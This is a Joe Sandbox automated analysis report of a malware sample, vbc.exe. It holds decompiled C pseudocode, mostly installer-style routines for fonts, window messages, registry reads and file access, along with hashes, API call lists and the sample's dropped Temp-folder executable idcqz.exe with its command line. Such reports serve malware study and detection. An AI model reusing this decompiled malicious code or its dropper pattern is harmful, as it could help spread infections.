Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32 ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}

0x00404e80
0x00404e85
0x00404e8d
0x00404e8e
0x00404e9b
0x00404ea3
0x00404ea4
0x00404ea6
0x00404ea8
0x00404eaa
0x00404ead
0x00404ead
0x00404eb4
0x00404eba
0x00404eba
0x00404ec1
0x00404ec8
0x00404ecb
0x00404ece
0x00404ece
0x00404ed2
0x00404ee2
0x00404ee4
0x00404ee7
0x00404e90
0x00404e90
0x00404e97
0x00404e97
0x00404eef
0x00404efa
0x00404f10
0x00404f21
0x00404f3d

APIs

lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
wsprintfW.USER32 ref: 00404F21
SetDlgItemTextW.USER32 ref: 00404F34

Strings

%u.%u%s%s, xrefs: 00404F02

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f3e
0x00405f4b
0x00405f4c
0x00405f57
0x00405f5f
0x00405f5f
0x00405f67

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
CharPrevW.USER32(?,00000000), ref: 00405F4D
lstrcatW.KERNEL32 ref: 00405F5F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD

Uniqueness

Uniqueness Score: -1.00%

Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}

0x00405648
0x00405652
0x0040566e
0x00405690
0x00405693
0x00405699
0x004056a3
0x004056a4
0x004056a6
0x004056ac
0x004056ac
0x004056b6
0x00000000
0x004056c4
0x0040567b
0x004056b3
0x004056b3
0x00000000
0x004056b3
0x00405687
0x00405689
0x00000000
0x00405689
0x00405658
0x00000000
0x00000000
0x0040565f
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405673
CallWindowProcW.USER32(?,?,?,?), ref: 004056C4

Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628

Strings

, xrefs: 00405654

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040654a
0x0040654c
0x00406564
0x00406569
0x0040656e
0x004065ac
0x004065ac
0x00406570
0x00406582
0x0040658d
0x00406593
0x0040659e
0x00000000
0x00000000
0x0040659e
0x004065b2

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800), ref: 00406582
RegCloseKey.ADVAPI32(?), ref: 0040658D

Strings

C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 00406543

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CloseQueryValue
String ID: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
API String ID: 3356406503-2166095966
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060d3
0x004060d5
0x004060d8
0x00406104
0x004060dd
0x004060e6
0x004060eb
0x004060f6
0x004060f9
0x00406115
0x004060fb
0x00406102
0x00000000
0x00406102
0x0040610e
0x00406112
0x00406112
0x0040610c
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
CharNextA.USER32(00000000), ref: 004060FC
lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: idcqz.exePID: 2428, Parent PID: 2372COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	4.6%
Signature Coverage:	8.9%
Total number of Nodes:	1724
Total number of Limit Nodes:	109

Executed Functions

Function 00110809 Relevance: 7.7, APIs: 5, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001109D1

Memory Dump Source

Source File: 00000005.00000002.972498932.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_110000_idcqz.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9103d7a314f1b309b8927f27c8bda906b513836b8576f471a739e17504b2bec8
Instruction ID: 8eb329ec4fc5c63c17c6919774656cfcbde7478ad832a38307eac2a41d7ffc2a
Opcode Fuzzy Hash: 9103d7a314f1b309b8927f27c8bda906b513836b8576f471a739e17504b2bec8
Instruction Fuzzy Hash: E0713E35E50348EADF55DBE4E852BEDB7B5AF88710F20442AE508EB2E0D7B11A81DB05

Uniqueness

Uniqueness Score: -1.00%

Function 00B512BE Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00B512BE(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				signed int _t78;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E00B51530(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(_t119 == 0) {
							goto L3;
						} else {
							_t78 = _t74 | 0xffffffff;
							__eflags = _t97 - _t78 / _a12;
							if(_t97 > _t78 / _a12) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
